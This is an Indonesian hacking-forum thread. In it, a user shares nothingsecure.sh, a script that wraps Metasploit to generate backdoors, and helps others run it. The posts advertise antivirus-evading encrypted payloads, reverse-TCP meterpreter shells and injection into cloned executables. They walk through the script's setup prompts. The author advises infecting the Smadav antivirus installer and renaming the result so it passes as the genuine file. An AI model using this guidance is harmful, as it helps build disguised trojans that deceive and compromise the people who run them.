Posts: 2,291
Threads: 269
Joined: Mar 2011
(10-31-2012, 03:34 PM)wine trochanter Wrote: ini di isi apa yah om?
maaf bertanya yg gak penting
diisikan metasploit direktori path ya ...
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only
Posts: 929
Threads: 141
Joined: Jul 2011
(10-31-2012, 03:40 PM)zee eichel Wrote: (10-31-2012, 03:34 PM)wine trochanter Wrote: ini di isi apa yah om?
maaf bertanya yg gak penting
diisikan metasploit direktori path ya ...
opt/metasploit?? gtu aja kan?
oke dah di coba om
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret
visit: http://warungiso.blogspot.com/
I was not smart or special but I was unix
Posts: 2,291
Threads: 269
Joined: Mar 2011
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only
Posts: 7
Threads: 0
Joined: Aug 2011
bro,
ane dapatnya seperti ini di vmware BT5 r3 :
root@bt:~# bash nothingsecure.sh
: command not foundine 2:
" does not exist.
: command not foundine 11:
'othingsecure.sh: line 12: syntax error near unexpected token `{
'othingsecure.sh: line 12: `function intro() {
Posts: 485
Threads: 46
Joined: Jun 2012
Nice Buanget dah om .....
Posts: 77
Threads: 6
Joined: Jun 2012
(10-31-2012, 05:20 PM)kataibrengsek Wrote: bro,
ane dapatnya seperti ini di vmware BT5 r3 :
root@bt:~# bash nothingsecure.sh
: command not foundine 2:
" does not exist.
: command not foundine 11:
'othingsecure.sh: line 12: syntax error near unexpected token `{
'othingsecure.sh: line 12: `function intro() {
copynya harus pake save as
Posts: 387
Threads: 27
Joined: Mar 2012
(10-31-2012, 02:59 PM)zee eichel Wrote: Sekali lagi ane mau bagi2 codingan ane mengenai automatic backdoor injection pada metasploit. nothingsecure.sh ini dapat anda ubek-ubek rubah codingannya jika perlu ... namun jgn lupa lho jgn mengganti author yah
Quote:Nama : NOTHINGSECURE.SH
version : v1.0 beta
author : zee eichel
email : [email protected]
work tested in : dracos, backtrack 5 R2,R3, ubuntu
fitur :
Code: (windows)
1. automatic generate backdoor for x86 windows ( tested on xp, vista, 7 )
2. automatic generate undetectable backdoor with encryption bypassing antivirus ( tested on xp, vista, 7 , smadav, avira, northon )
3. automatic generate backdoor clonning exe injection with encryption ( tested on xp, vista, 7 , smadav, avira, northon )
Code: (Linux)
1. automatic generate linux backdoor reverse TCP injection ( tested on ubuntu, backtrack )
2. automatic war linux backdoor ( tested on ubuntu server 8.04, 10.04, 12.04, fedora, centos )
usage :
Code: root@dracos: chmod +x nothingsecure.sh
root@dracos:./nothingsecure.sh
bagi yang masih gk bisa makenya posting thread ini ... kita kembangin sama2 yah
code ane attach disini
om ane mau nanya ??
apakah benar begini, ane kagak mudeng yang ini ??
di cek ya..
ip address anda adalah 172.10.10.109
set port yang akan anda gunakan :_4444
berapa kali hendak anda enskripsi? [1-10] :_10
set payload yang akan anda gunakan [meterpreter/shell] :_/meterpreter/reverse_tcset nama backdoor anda :_download
set ekstension backdoor anda [exe/jpg/gif/dll] :_exe
set posisi file exe yang hendak di infeksi :_/var/www <<<<
set direktori untuk output backdoor :_/var/www/
note : <<<< ini dia
(10-31-2012, 08:23 PM)dracos-linux Wrote: (10-31-2012, 05:20 PM)kataibrengsek Wrote: bro,
ane dapatnya seperti ini di vmware BT5 r3 :
root@bt:~# bash nothingsecure.sh
: command not foundine 2:
" does not exist.
: command not foundine 11:
'othingsecure.sh: line 12: syntax error near unexpected token `{
'othingsecure.sh: line 12: `function intro() {
copynya harus pake save as
coba di chmod dulu om ??
chmod +x nothingsecure.sh
terus jalanin ./nothingsecure.sh
Quote:~ Tan Hana Wighna Tan Sirna ~
(This post was last modified: 10-31-2012, 09:54 PM by gnome_selpa.)
Posts: 177
Threads: 7
Joined: Mar 2012
wah.. saya masih mesti banyak belajar nih pake source ini, hehe...
belum ngerti mulai dari path, sampe apa yg mesti dimasukin di sini, hehe..
kalau boleh, tolong dishare juga step by step untuk menggunakan script ini.
makasih.
Security awareness should be the continuing practice of a skill and not the continuous reminder of a threat.
Posts: 2,291
Threads: 269
Joined: Mar 2011
(10-31-2012, 09:50 PM)gnome_selpa Wrote: om ane mau nanya ??
apakah benar begini, ane kagak mudeng yang ini ??
di cek ya..
ip address anda adalah 172.10.10.109
set port yang akan anda gunakan :_4444
berapa kali hendak anda enskripsi? [1-10] :_10
set payload yang akan anda gunakan [meterpreter/shell] :_/meterpreter/reverse_tcset nama backdoor anda :_download
set ekstension backdoor anda [exe/jpg/gif/dll] :_exe
set posisi file exe yang hendak di infeksi :_/var/www <<<<
set direktori untuk output backdoor :_/var/www/
note : <<<< ini dia
set payload yang akan anda gunakan [meterpreter/shell] :_ itu di isikan meterpreter atau shell .. so isikan
Code: set payload yang akan anda gunakan [meterpreter/shell] :_meterpreter
set posisi file exe yang hendak di infeksi :_/var/www <<<<
itu di isikan path file exe yang hendak kita buat .. misalnya anda hendak menginjeksi file smadav.exe maka download dulu file smadav.exe misalkan anda simpan di root maka isikan
Code: set posisi file exe yang hendak di infeksi :_/root/smadav.exe
nama backdoor anda :_download
lebih baik anda isikan ekstensinya .. misalkan download.exe
Code: nama backdoor anda :_download.exe
note : alangkah lebih baik anda memberi nama sama dengan nama file exe yang hendak anda infeksi dan cloning.. misalkan smadav1.exe tinggal rename lagi smadav.exe klo memang di save ke direktori yang sama dengan smadav.exe nya .. klo gk langsung sja smadav.exe
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only
(This post was last modified: 11-01-2012, 01:47 AM by zee eichel.)
Posts: 18
Threads: 0
Joined: Aug 2012
ijin coba om zee,http://forum.indonesianbacktrack.or.id/images/smilies/penguin-015.gif kyknya seru nie
|